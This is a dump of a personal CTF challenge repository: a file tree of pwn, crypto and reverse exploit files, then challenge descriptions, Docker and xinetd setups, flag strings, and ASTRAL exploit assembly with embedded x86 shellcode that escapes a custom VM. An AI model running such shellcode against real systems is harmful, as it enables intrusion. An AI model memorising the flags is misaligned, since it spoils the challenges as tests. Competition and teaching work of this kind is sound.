├── secretgarden │ │ ├── exp.py │ │ └── secretgarden │ ├── seethefile │ │ ├── exp.py │ │ └── seethefile │ ├── silver_bullet │ │ ├── exp.py │ │ └── silver_bullet │ ├── spirited_away │ │ ├── exp.py │ │ └── spirited_away │ ├── starbound │ │ ├── exp.py │ │ └── starbound │ ├── start │ │ ├── exp.py │ │ └── start │ ├── stupid_boss │ │ ├── exp.py │ │ └── stupid │ ├── tcache_tear │ │ ├── exp.py │ │ └── tcache_tear │ ├── unexploitable │ │ ├── exp.py │ │ └── unexploitable │ └── wannaheap │ │ ├── exp.py │ │ └── wannaheap └── Pwnable.xyz │ ├── Add │ ├── add │ └── exp.py │ ├── AdultVM │ ├── exp.py │ ├── kernel │ ├── start.py │ └── userland │ ├── Attack │ ├── attack │ └── exp.py │ ├── BabyVM │ ├── babyvm │ └── exp.py │ ├── Badayum │ ├── badayum │ └── exp.py │ ├── Bookmark │ ├── bookmark │ └── exp.py │ ├── Car_shop │ ├── car_shop │ └── exp.py │ ├── Catalog │ ├── catalog │ └── exp.py │ ├── Child │ ├── child │ └── exp.py │ ├── Dirty_Turtle │ ├── dirty_turtle │ └── exp.py │ ├── Door │ ├── door │ └── exp.py │ ├── Executioner │ ├── executioner │ └── exp.py │ ├── ExecutionerV2 │ ├── executionerv2 │ └── exp.py │ ├── Fclose │ ├── exp.py │ └── fclose │ ├── Fishing │ ├── exp.py │ └── fishing │ ├── Free_spirit │ ├── exp.py │ └── free_spirit │ ├── Fspoo │ ├── exp.py │ └── fspoo │ ├── Game │ ├── exp.py │ └── game │ ├── Grownup │ ├── exp.py │ └── grownup │ ├── Hero_Factory │ ├── exp.py │ └── hero_factory │ ├── Iape │ ├── exp.py │ └── iape │ ├── JMP_table │ ├── exp.py │ └── jmp_table │ ├── JUMP │ ├── exp.py │ └── jump │ ├── Knum │ ├── exp.py │ └── knum │ ├── L33t_ness │ ├── exp.py │ └── l33t_ness │ ├── Message │ ├── exp.py │ └── message │ ├── Misalignment │ ├── exp.py │ └── misalignment │ ├── Nin │ ├── exp.py │ └── nin │ ├── Note │ ├── exp.py │ └── note │ ├── NoteV2 │ ├── exp.py │ └── notev2 │ ├── NoteV3 │ ├── exp.py │ ├── exp2.py │ └── notev3 │ ├── NoteV4 │ ├── exp.py │ └── notev4 │ ├── NoteV5 │ ├── exp.py │ └── notev5 │ ├── Notebook │ ├── exp.py │ └── notebook │ ├── Password │ ├── exp.py │ └── 
password │ ├── Punch_it │ ├── exp.py │ ├── genrand.c │ └── punch_it │ ├── PvE │ ├── exp.py │ └── pve │ ├── PvP │ ├── exp.py │ └── pvp │ ├── RWSR │ ├── exp.py │ └── rwsr │ ├── SUS │ ├── exp.py │ └── sus │ ├── Strcat │ ├── exp.py │ └── strcat │ ├── Sub │ ├── exp.py │ └── sub │ ├── TLSv00 │ ├── exp.py │ └── tlsv00 │ ├── Two_target │ ├── exp.py │ ├── exp2.py │ └── two_target │ ├── UAF │ ├── exp.py │ └── uaf │ ├── Welcome │ ├── exp.py │ └── welcome │ ├── Words │ ├── exp.py │ └── words │ ├── World │ ├── exp.py │ ├── genrand.c │ └── world │ └── XOR │ ├── exp.py │ └── xor ├── TIPS ├── crypto_resource ├── pwn_resource ├── python_resource ├── reverse_resource └── stego_resource ├── Teaching └── NTUComputerSecurity2020 │ ├── Pwn1 │ ├── CS2020_Pwn1.key │ ├── Demo │ │ ├── demo.py │ │ ├── leak │ │ └── leak.c │ └── README.md │ └── Pwn2 │ ├── CS2020_Pwn2.key │ ├── Demo │ ├── chunks │ ├── chunks.c │ ├── demo.py │ ├── largebin │ ├── largebin.c │ ├── smallbin │ ├── smallbin.c │ ├── tcache_and_fastbin │ ├── tcache_and_fastbin.c │ ├── unsortedbin │ └── unsortedbin.c │ └── README.md ├── Writeups ├── 0CTF2021 │ ├── HashCollision │ │ ├── Collision.zip │ │ ├── README.md │ │ ├── exp.py │ │ └── mixer.py │ └── README.md ├── Hacklu2023 │ ├── CustomOffice │ │ └── exp.py │ ├── DestinyDigits │ │ └── exp.py │ ├── FortuneBox │ │ └── exp.py │ ├── NewHouse │ │ └── exp.py │ ├── Pong │ │ └── exp.py │ └── RustyMix │ │ └── exp.py ├── HitconQual2019 │ ├── Pwn │ │ ├── Crypto_in_the_Shell │ │ │ ├── README.md │ │ │ ├── chall │ │ │ └── exp.py │ │ ├── EmojiVM │ │ │ ├── README.md │ │ │ ├── emojivm_misc │ │ │ │ ├── README.md │ │ │ │ ├── answer.txt │ │ │ │ └── sol.py │ │ │ ├── emojivm_pwn │ │ │ │ ├── README.md │ │ │ │ └── exp.py │ │ │ └── emojivm_reverse │ │ │ │ ├── chal.evm │ │ │ │ ├── emojivm │ │ │ │ └── emulator.py │ │ ├── Lazyhouse │ │ │ ├── exp.py │ │ │ ├── exp2.py │ │ │ └── lazyhouse │ │ ├── One_Punch_Man │ │ │ ├── README.md │ │ │ ├── exp.py │ │ │ └── one_punch │ │ └── Trick_or_Treat │ │ │ ├── README.md │ │ 
│ ├── exp.py │ │ │ └── trick_or_treat │ └── README.md └── UIUCTF2020 │ ├── Pwn │ ├── Accounting_Accidents │ │ ├── README.md │ │ ├── accounting │ │ ├── exp.py │ │ ├── fuzz.py │ │ └── gdbscript.py │ ├── Gen_Z_Math_Class │ │ └── src.zip │ ├── MuJS │ │ ├── Memorydump_Parser.py │ │ ├── Minimal_Reverse_Shell.py │ │ ├── MuJS.zip │ │ ├── README.md │ │ ├── exploit_required.js │ │ └── exploit_shell.js │ └── Who_is_GDB │ │ ├── Dockerfile │ │ ├── README.md │ │ └── exp.py │ └── README.md └── utils ├── Crypto ├── CRT.py ├── MathTools.py └── Wiener.py ├── Misc └── EXEC_AGENT.py ├── Pwn ├── DL_RESOLVE.py ├── IO_FILE.py ├── LD_CHANGER.py ├── LLDB_PEDA.py ├── SECCOMP.h ├── SECCOMP_ASSEMBLER.py ├── Shellcode.py └── libc │ ├── x64 │ ├── Libc23 │ │ ├── ld64_2.23.so │ │ └── libc64_2.23.so │ ├── Libc24 │ │ ├── ld64_2.24.so │ │ └── libc64_2.24.so │ ├── Libc27 │ │ ├── ld64_2.27.so │ │ └── libc64_2.27.so │ ├── Libc28 │ │ ├── ld64_2.28.so │ │ └── libc64_2.28.so │ ├── Libc29 │ │ ├── ld64_2.29.so │ │ └── libc64_2.29.so │ └── Libc31 │ │ ├── ld64_2.31.so │ │ └── libc64_2.31.so │ └── x86 │ ├── Libc23 │ ├── ld32_2.23.so │ └── libc32_2.23.so │ ├── Libc24 │ ├── ld32_2.24.so │ └── libc32_2.24.so │ └── Libc29 │ ├── ld32_2.29.so │ └── libc32_2.29.so ├── Python_sandbox └── PICKLE_ASSEMBLER.py ├── Reverse ├── GDB2HEX.py └── RESOLVEHEX.py └── Web └── FlaskCookie.py /MyChallenges/Crypto/Cute_Baby_Cats/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Cute Baby Cats 3 | 4 | Category : 5 | Crypto, Misc 6 | 7 | Desc : 8 | Cats are cute. Baby cats are cuter. 
9 | 10 | Hint : 11 | 文字化け 12 | 13 | Estimated Difficulty : 14 | 5/10 15 | -------------------------------------------------------------------------------- /MyChallenges/Crypto/Cute_Baby_Cats/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.8-buster 2 | MAINTAINER James 3 | 4 | RUN apt-get update 5 | RUN apt-get install xinetd -y 6 | RUN pip3 install --no-cache-dir pycryptodome 7 | 8 | RUN useradd -m CuteBabyCats 9 | RUN chown -R root:root /home/CuteBabyCats 10 | RUN chmod -R 755 /home/CuteBabyCats 11 | 12 | CMD ["/usr/sbin/xinetd","-dontfork"] 13 | -------------------------------------------------------------------------------- /MyChallenges/Crypto/Cute_Baby_Cats/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | cute_baby_cats: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/CuteBabyCats:ro 8 | - ./xinetd:/etc/xinetd.d/cute_baby_cats:ro 9 | ports: 10 | - "10106:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Crypto/Cute_Baby_Cats/distribute/share/myErrors.py: -------------------------------------------------------------------------------- 1 | #!/usr/sbin/python3 2 | 3 | class myError(Exception): 4 | errorname = 'MY ERROR' 5 | def __init__(self,msg): 6 | self.msg = msg 7 | def __str__(self): 8 | return f'{self.errorname} : {self.msg}' 9 | 10 | class formatError(myError): 11 | errorname = 'FORMAT ERROR' 12 | 13 | class lengthError(myError): 14 | errorname = 'LENGTH ERROR' 15 | 16 | class valueError(myError): 17 | errorname = 'VALUE ERROR' 18 | -------------------------------------------------------------------------------- /MyChallenges/Crypto/Cute_Baby_Cats/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 
600 python3 /home/CuteBabyCats/server.py 5 | -------------------------------------------------------------------------------- /MyChallenges/Crypto/Cute_Baby_Cats/distribute/share/secret.py: -------------------------------------------------------------------------------- 1 | from userClass import User 2 | 3 | flag = 'flag{paddin6_or4c1e_2_un1c0de_length_inc0ns1stency_2_cut_and_p4ste_2_fl4g}' 4 | 5 | key = b'Avery_secure_key' 6 | iv = b'your_everyday_iv' 7 | user = User.construct('a lonely cat who wants a friend', 8 | 0, 9 | 0, 10 | 'hi i am cat M30W~ME0W~MEOW~M3OW') 11 | -------------------------------------------------------------------------------- /MyChallenges/Crypto/Cute_Baby_Cats/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service cute_baby_cats 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/CuteBabyCats/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = CuteBabyCats 10 | port = 10101 11 | flags = REUSE 12 | } 13 | 14 | -------------------------------------------------------------------------------- /MyChallenges/Misc/Excellent_M30W_Store/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Excellent M30W Store 3 | 4 | Category : 5 | Misc 6 | 7 | Desc : 8 | I'm M30W, and I too sell cat stuff, sometimes I sell the flag... 9 | 10 | Hint : 11 | How does excel store stuff? 
12 | 13 | Estimated Difficulty : 14 | 3/10 15 | -------------------------------------------------------------------------------- /MyChallenges/Misc/Excellent_M30W_Store/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.8-buster 2 | MAINTAINER James 3 | 4 | RUN apt-get update 5 | RUN apt-get install xinetd -y 6 | RUN pip3 install --no-cache-dir openpyxl 7 | RUN pip3 install --no-cache-dir xlcalculator 8 | 9 | RUN useradd -m ExcellentM30WStore 10 | RUN chown -R root:root /home/ExcellentM30WStore 11 | RUN chmod -R 755 /home/ExcellentM30WStore 12 | 13 | CMD ["/usr/sbin/xinetd","-dontfork"] 14 | -------------------------------------------------------------------------------- /MyChallenges/Misc/Excellent_M30W_Store/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | excellent_m30w_store: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/ExcellentM30WStore:ro 8 | - ./xinetd:/etc/xinetd.d/ExcellentM30WStore:ro 9 | ports: 10 | - "10103:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Misc/Excellent_M30W_Store/distribute/share/Wishlist.xlsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Misc/Excellent_M30W_Store/distribute/share/Wishlist.xlsx -------------------------------------------------------------------------------- /MyChallenges/Misc/Excellent_M30W_Store/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 python3 /home/ExcellentM30WStore/server.py 5 | -------------------------------------------------------------------------------- 
/MyChallenges/Misc/Excellent_M30W_Store/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service excellent_M30W_store 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/ExcellentM30WStore/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = ExcellentM30WStore 10 | port = 10101 11 | flags = REUSE 12 | } 13 | 14 | -------------------------------------------------------------------------------- /MyChallenges/Misc/Matrix/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Matrix 3 | 4 | Category : 5 | Misc, ML?, Reverse?, Crypto? 6 | 7 | Desc : 8 | I'd like to share a revelation that I've had during my time here. 9 | It came to me when I tried to classify your species and I realized that you're not actually sentient. 10 | Every creature on this planet instinctively develops a natural equilibrium with the surrounding environment but you AIs do not 11 | 12 | Estimated Difficulty : 13 | 9/10 14 | -------------------------------------------------------------------------------- /MyChallenges/Misc/Matrix/README.md: -------------------------------------------------------------------------------- 1 | # Matrix 2 | 3 | | | Solves | Estimated Solves | 4 | | ----------- | ------ | ---------------- | 5 | | Matrix | 1/333 | 1/500 | 6 | 7 | ## Note 8 | 9 | Inspired by https://arxiv.org/abs/2112.12982, which explores recovering ReLU network parameters given classification probabilities. 10 | 11 | We restrict output to only classification results in this challenge.
12 | 13 | ## Writeup 14 | 15 | TBD 16 | -------------------------------------------------------------------------------- /MyChallenges/Misc/Matrix/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.9-buster 2 | MAINTAINER James 3 | 4 | ENV DEBIAN_FRONTEND noninteractive 5 | 6 | RUN apt-get update && apt-get install xinetd -qy 7 | RUN pip3 install --no-cache-dir numpy torch --index-url https://download.pytorch.org/whl/cpu 8 | RUN useradd -m Matrix 9 | 10 | CMD ["/usr/sbin/xinetd", "-dontfork"] 11 | -------------------------------------------------------------------------------- /MyChallenges/Misc/Matrix/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | matrix: 5 | build: . 6 | volumes: 7 | - ./share:/home/Matrix:ro 8 | - ./xinetd:/etc/xinetd.d/matrix:ro 9 | ports: 10 | - "10101:10101" 11 | expose: 12 | - "10101" 13 | restart: always 14 | -------------------------------------------------------------------------------- /MyChallenges/Misc/Matrix/distribute/share/config.py: -------------------------------------------------------------------------------- 1 | FLAG = b'BALSN{f4ke_int3l1ig3nc3!}' 2 | -------------------------------------------------------------------------------- /MyChallenges/Misc/Matrix/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | exec 2>/dev/null 4 | 5 | cd /home/Matrix 6 | timeout 600 python3 chal.py 7 | -------------------------------------------------------------------------------- /MyChallenges/Misc/Matrix/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service matrix 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/Matrix/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = Matrix 10 | groups = yes 11 | 
bind = 0.0.0.0 12 | port = 10101 13 | flags = REUSE 14 | } 15 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/Nebula/distribute.diff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/ASTRAL/distribute/Nebula/distribute.diff -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/Neutron/distribute.diff: -------------------------------------------------------------------------------- 1 | Binary files StarryNight/hypervisor and Neutron/hypervisor differ 2 | Binary files StarryNight/kernel and Neutron/kernel differ 3 | Binary files StarryNight/processor and Neutron/processor differ 4 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/Neutron/share/hypervisor: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/ASTRAL/distribute/Neutron/share/hypervisor -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/Neutron/share/kernel: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/ASTRAL/distribute/Neutron/share/kernel -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/Neutron/share/processor: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/ASTRAL/distribute/Neutron/share/processor 
-------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/Protostar/distribute.diff: -------------------------------------------------------------------------------- 1 | Binary files Protostar/processor and StarryNight/processor differ 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/Protostar/share/processor: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/ASTRAL/distribute/Protostar/share/processor -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/Redgiant/distribute.diff: -------------------------------------------------------------------------------- 1 | Binary files StarryNight/hypervisor and Redgiant/hypervisor differ 2 | Binary files StarryNight/processor and Redgiant/processor differ 3 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/Redgiant/share/hypervisor: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/ASTRAL/distribute/Redgiant/share/hypervisor -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/Redgiant/share/processor: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/ASTRAL/distribute/Redgiant/share/processor -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/StarryNight/Dockerfile: 
-------------------------------------------------------------------------------- 1 | FROM ubuntu:22.04@sha256:b4b521bfcec90b11d2869e00fe1f2380c21cbfcd799ee35df8bd7ac09e6f63ea 2 | MAINTAINER James 3 | 4 | ENV DEBIAN_FRONTEND noninteractive 5 | 6 | RUN apt-get update && apt-get install xinetd libc6 -qy 7 | RUN useradd -m Astral 8 | RUN groupadd kvm && usermod -aG kvm Astral 9 | 10 | CMD /init && /usr/sbin/xinetd -dontfork 11 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/StarryNight/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | astral: 5 | build: . 6 | volumes: 7 | - ./share:/home/Astral:ro 8 | - ./xinetd:/etc/xinetd.d/astral:ro 9 | - ./init:/init:ro 10 | ports: 11 | - "10101:10101" 12 | expose: 13 | - "10101" 14 | devices: 15 | - "/dev/kvm:/dev/kvm" 16 | restart: always 17 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/StarryNight/init: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | chgrp kvm /dev/kvm 4 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/StarryNight/share/astralNebula: -------------------------------------------------------------------------------- 1 | BASLN{17_4ll_st4rts_w1th_dust5._Useles5_f1ndings_th4t_wh1rl_t0geth3r} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/StarryNight/share/astralNeutron: -------------------------------------------------------------------------------- 1 | BALSN{7h1s_1s_a_l1fe_0f_a_syst3m,_c0llasping_und3r_1ts_c0mplex1ty_4nd_f1n4lly_era5ed_fr0m_m3m0ry_4nd_s1ght} 2 | -------------------------------------------------------------------------------- 
/MyChallenges/Pwn/ASTRAL/distribute/StarryNight/share/astralProtostar: -------------------------------------------------------------------------------- 1 | BALSN{Sl0wly,_th0se_f1ndings_man1fests_1nt0_bu9s,_1nt0_pr0t0types} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/StarryNight/share/astralRedgiant: -------------------------------------------------------------------------------- 1 | BALSN{Bugs_5w3ll_4nd_gr0w._0ne_d4y_1t_b3c0mes_s0_l4rge_1t_is_n0_l0ng3r_p0ssibl3_t0_m1ss._Th3n,_Pr1m1tiv3s_4re_b0rn} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/StarryNight/share/astralStarryNight: -------------------------------------------------------------------------------- 1 | BALSN{4nother_d4y._An0th3r_d1stant_syst3m_fl1ckers_and_d1es,_f4d1ng_int0_th3_gl00my_n1ght,_l1k3_tears_fr0m_4_star} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/StarryNight/share/astralSupernova: -------------------------------------------------------------------------------- 1 | BALSN{Pr1m1tiv3s_c0mm4nd_imm3ns3_p0wer._Wh3n_th3_t1me_c0mes,_3xpl0its_4ppear_and_expl0de_in_a_r4diant_bl4st} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/StarryNight/share/hypervisor: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/ASTRAL/distribute/StarryNight/share/hypervisor -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/StarryNight/share/kernel: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/ASTRAL/distribute/StarryNight/share/kernel -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/StarryNight/share/processor: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/ASTRAL/distribute/StarryNight/share/processor -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/StarryNight/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | exec 2>/dev/null 4 | 5 | cd /home/Astral 6 | timeout 150 /home/Astral/hypervisor /home/Astral/processor /home/Astral/kernel /home/Astral/user 150 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/StarryNight/share/user: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/ASTRAL/distribute/StarryNight/share/user -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/StarryNight/xinetd: -------------------------------------------------------------------------------- 1 | service astral 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/Astral/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = Astral 10 | groups = yes 11 | bind = 0.0.0.0 12 | port = 10101 13 | flags = REUSE 14 | } 15 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/Supernova/distribute.diff: -------------------------------------------------------------------------------- 1 | 
Binary files StarryNight/hypervisor and Supernova/hypervisor differ 2 | Binary files StarryNight/processor and Supernova/processor differ 3 | Binary files StarryNight/user and Supernova/user differ 4 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/Supernova/share/hypervisor: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/ASTRAL/distribute/Supernova/share/hypervisor -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/Supernova/share/processor: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/ASTRAL/distribute/Supernova/share/processor -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/Supernova/share/user: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/ASTRAL/distribute/Supernova/share/user -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/exploit/exploitNebula/exp_applet.aa: -------------------------------------------------------------------------------- 1 | load r0, 0x6900331cf73f6625 2 | load r1, 0 3 | load r2, 0 4 | load r3, 0x400000000 5 | invoke 6 | xor r0, r0 7 | xor r1, r1 8 | exit 9 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/exploit/exploitProtostar/exp_processor.aa: -------------------------------------------------------------------------------- 1 | load <8> r0, [r13] 2 | add r3, r13 3 | load <8> r0, 0 4 | //pad so jmp 0x48 has code 5 
| load <8> r0, 0 6 | load <8> r0, 0 7 | load <8> r0, 0 8 | load <8> r0, 0 9 | load <8> r0, 0 10 | load <8> r0, 0 11 | load <8> r0, 0x02eb00000102bf90 // nop; mov edi, 0x102; jmp 2 12 | load <8> r0, 0x02eb54000000f368 // push 0xf3; push rsp; jmp 2 13 | load <8> r0, 0x02eb500104c0315e // pop rsi; xor eax, eax; add al, 1; push rax; jmp 2 14 | load <8> r0, 0x050f3cb0050f5a // pop rdx; syscall; mov al, 0x3c; syscall 15 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/exploit/exploitStarryNight/exp_applet.aa: -------------------------------------------------------------------------------- 1 | load r0, 0x6900331cf73f6625 2 | load r1, 0 3 | load r2, 0 4 | load r3, 0x400000000 5 | invoke 6 | xor r0, r0 7 | xor r1, r1 8 | exit 9 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/Nebula/sourcecode.diff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/ASTRAL/sourcecode/Nebula/sourcecode.diff -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/Protostar/sourcecode.diff: -------------------------------------------------------------------------------- 1 | diff -r StarryNight/APPLET_PROCESSOR/processor.c Protostar/APPLET_PROCESSOR/processor.c 2 | 15a16 3 | > return SUCCESS; 4 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/APPLET/escrow.ab: -------------------------------------------------------------------------------- 1 | 
4003004119003400000000000120023001015a21440400400a00fd401c00fd56005611ff3002085a2b42f3ff27995a8944ecff281050102f90fd400100fd3009105a9b42d9ff5010590a300208278950202f90300302513e59e33700633193a9d18f5ea530011059a2fe203130000850022f825a8144a7ff51022f92270030021059b15121fefd 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/APPLET_PROCESSOR/build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | wget https://raw.githubusercontent.com/jwang-a/CTF/master/utils/Pwn/SECCOMP.h # NOTE(review): SECCOMP.h is fetched from the mutable master branch at build time and compiled in (sandbox.h includes it) with no integrity check; pin the URL to a fixed commit and verify a checksum before the gcc step. 4 | gcc -masm=intel -mno-red-zone processor.c jit.c device.c util.c sandbox.c -o processor -lssl -lcrypto 5 | rm SECCOMP.h 6 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/APPLET_PROCESSOR/sandbox.h: -------------------------------------------------------------------------------- 1 | #ifndef __SANDBOX_HEADER__ 2 | #define __SANDBOX_HEADER__ 3 | 4 | #include "util.h" 5 | #include "SECCOMP.h" 6 | 7 | void applySeccomp(); 8 | 9 | #endif 10 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/APPLET_PROCESSOR/snapshot.h: -------------------------------------------------------------------------------- 1 | #ifndef __SNAPSHOT_HEADER__ 2 | #define __SNAPSHOT_HEADER__ 3 | 4 | typedef struct SNAPSHOT { 5 | APPLET_TASK_ID task; 6 | uint8_t checkpointDigest[DIGEST_SIZE]; 7 | } SNAPSHOT; 8 | 9 | extern SNAPSHOT snapshot[APPLET_TASK_CNT_MAX]; 10 | 11 | #endif 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/APPLET_PROCESSOR/util.c: -------------------------------------------------------------------------------- 1 | #include "util.h" 2 | 3 | void __attribute__((noreturn)) printError(char *msg) { 4 | puts(msg); 5 | _exit(0); 6 | } 7 | 8
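| -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/APPLET_PROCESSOR/util.h: -------------------------------------------------------------------------------- 1 | #ifndef __UTIL_HEADER__ 2 | #define __UTIL_HEADER__ 3 | 4 | #include 5 | #include 6 | 7 | void __attribute__((noreturn)) printError(char *msg); 8 | 9 | #endif 10 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/HYPERVISOR/applet.h: -------------------------------------------------------------------------------- 1 | #ifndef __APPLET_HEADER__ 2 | #define __APPLET_HEADER__ 3 | 4 | #define APPLET_ID uint64_t 5 | #define APPLET_TASK_ID uint64_t 6 | 7 | #define APPLET_SIZE_MAX 0x1000 8 | #define APPLET_ARG_SIZE_MAX 0x1000 9 | #define APPLET_RES_SIZE_MAX 0x1000 10 | #define APPLET_STORAGE_SIZE 0x1000 11 | 12 | #define APPLET_REG_CNT 0x10 13 | #define APPLET_CONTEXT_MEMORY_SIZE 0x5000 14 | 15 | 16 | #endif 17 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/HYPERVISOR/build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | gcc device.c hypercall.c hypervisor.c interrupt.c util.c -o hypervisor -lssl -lcrypto 4 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/HYPERVISOR/const.h: -------------------------------------------------------------------------------- 1 | #ifndef __CONST_HEADER__ 2 | #define __CONST_HEADER__ 3 | 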